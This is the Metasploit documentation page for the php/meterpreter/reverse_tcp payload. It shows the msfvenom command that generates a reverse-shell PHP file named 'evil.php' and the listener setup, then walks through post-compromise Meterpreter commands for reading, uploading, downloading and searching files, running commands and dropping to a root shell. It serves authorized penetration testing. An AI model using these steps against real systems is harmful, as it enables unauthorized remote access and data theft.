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GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/payload/php/meterpreter/
Views: 1904

The php/meterpreter/reverse_tcp is a staged payload used to gain meterpreter access to a compromised system. This is a unique payload in the Metasploit Framework because this payload is one of the only payloads that are used in RFI vulnerabilities in web apps. This module can be cross platform, but the target needs to be able to run php code.

Vulnerable Application

The PHP Meterpreter is suitable for any system that supports PHP. For example, the module can be used against webservers which run PHP code for a website. OS X has PHP installed by default.

Deploying php/meterpreter/reverse_tcp


Specific demo of using the module that might be useful in a real world scenario.

Generating a file with msfvenom

msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o evil.php

Starting a listener

msf > use multi/handler msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp PAYLOAD => php/meterpreter/reverse_tcp msf exploit(handler) > set LHOST [IP] LHOST => [IP] msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Started reverse TCP handler on [IP]

Important Basic Commands

Compared to a native Meterpreter such as windows/meterpreter/reverse_tcp, the PHP Meterpreter has less commands, but here's a list of all the common ones you might need:

pwd command

The pwd command tells you the current working directory. For example:

meterpreter > pwd /Users/thecarterb/Desktop

cd command

The cd command allows you to change directories. Example:

meterpreter > cd /Users/thecarterb/Desktop meterpreter > pwd /Users/thecarterb/Desktop

cat command

The cat command allows you to see the content of a file:

meterpreter > cat /tmp/data.txt Hello World!

upload command

The upload command allows you to upload a file to the remote target. This is useful for uploading additional payload files. For example:

meterpreter > upload /tmp/data.txt /Users/thecarterb/Desktop [*] uploading : /tmp/data.txt -> /Users/thecarterb/Desktop [*] uploaded : /tmp/data.txt -> /Users/thecarterb/Desktop/data.txt meterpreter >

download command

The download command allows you to download a file from the remote target to your machine. For example:

meterpreter > download /Users/thecarterb/Desktop/data.txt /tmp/pass.txt [*] downloading: /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt [*] download : /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt meterpreter >

search command

The search command allows you to find files on the remote file system. For example, this shows how to find all text files in the current directory:

meterpreter > search -d . -f *.txt Found 2 results... .\pass.txt (13 bytes) ./creds\data.txt (83 bytes) meterpreter >

Without the -d option, the command will attempt to search in all drives.

The -r option for the command allows you to search recursively.

getuid command

The getuid command tells you the current user that Meterpreter is running on. For example:

meterpreter > getuid Server username: root

execute command

The execute command allows you to execute a command or file on the remote machine.

The following examples uses the command to create a text file:

meterpreter > execute -f echo -a "hello > /tmp/hello.txt" Process 73642 created. meterpreter >

ps command

The ps command lists the running processes on the remote machine.

shell command

The shell command allows you to interact with the remote machine's command prompt (or shell). For example:

meterpreter > shell Process 74513 created. Channel 2 created. sh-3.2#

If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel.


The sysinfo command shows you basic information about the remote machine. Such as:

  • Computer name

  • OS name

  • Architecture

  • Meterpreter type

Using post modules

When using the PHP Meterpreter, you have the feature of using Metasploit's post modules on that specific session. By default, most multi post modules will work; however, you can also use OS specific modules depending on the OS of the compromised system. For example, if you have a PHP Meterpreter session running on OS X, you can use osx post modules on that session.

Don't forget to:

  • Set the LHOST datastore option to the connect-back IP Address

  • If you want to get multiple shells, set ExitOnSession to false